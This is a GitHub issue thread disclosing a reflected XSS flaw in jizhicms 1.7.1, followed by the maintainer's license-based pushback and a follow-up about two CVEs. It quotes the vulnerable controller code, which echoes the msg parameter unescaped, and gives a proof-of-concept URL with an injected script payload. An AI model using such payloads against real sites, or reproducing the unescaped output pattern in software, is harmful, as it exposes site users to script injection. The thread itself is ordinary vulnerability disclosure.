jizhicms v1.7.1 msg reflected xss vulnerability

[mtfly]

A xss vulnerability was discovered in jizhicms 1.7.1

There is a reflected XSS vulnerability which allows remote attackers to inject arbitrary web script or HTML via the msg parameter of /index.php/Error/index?msg=1

Vulnerability file: Home/c/ErrorController.php

class ErrorController extends Controller
{
	//错误处理示例
	function index($msg){
		echo '错误信息提示：<br/>';	
		echo $msg;

    }
}

PoC:
http://example.com/index.php/Error/index?msg=%3Cscript%3Ealert(1)%3C/script%3E

[Cherry-toto]

首先，请您阅读安装时的使用协议！
如果你没有注意，我下面给你列举出来：

II. 义务
本软件为开源软件，您可以在遵循本授权协议的基础上使用此版本软件。
不得对本软件或与之关联的商业授权进行出租、出售、抵押。
不得利用本软件参与重大国际、国家等重点项目，发生一切安全、产权、事故等纠纷均由使用者承担。
禁止在 极致CMS 的整体或任何部分基础上以发展任何衍生版本、修改版本或第三方版本用于重新分发。
禁止使用者在未经官方允许的情况下发布 极致CMS 相关安全漏洞信息，取得官方授权并在官方修复漏洞后，可发布相关漏洞信息。

其次，此XSS不会造成任何影响。

[OS-WS]

HI, did you fix CVE-2020-23644 & CVE-2020-23643?
if so, in what commit?

thanks!

[Cherry-toto]

thanks for your message. the CVE-2020-23644 is fix and the CVE-2020-23643 no fix. We didn't pay attention to these CEVS because they didn't remind us. Thank you again for your reminder, we will fix it in the next version.

…

------------------&nbsp;原始邮件&nbsp;------------------ 发件人: "OrenSavichWS"<notifications@github.com&gt;; 发送时间: 2021年1月12日(星期二) 下午5:56 收件人: "Cherry-toto/jizhicms"<jizhicms@noreply.github.com&gt;; 抄送: "如沐春"<2581047041@qq.com&gt;; "State change"<state_change@noreply.github.com&gt;; 主题: Re: [Cherry-toto/jizhicms] jizhicms v1.7.1 msg reflected xss vulnerability (#28) HI, did you fix CVE-2020-23644 &amp; CVE-2020-23643? if so, in what commit? thanks! — You are receiving this because you modified the open/close state. Reply to this email directly, view it on GitHub, or unsubscribe.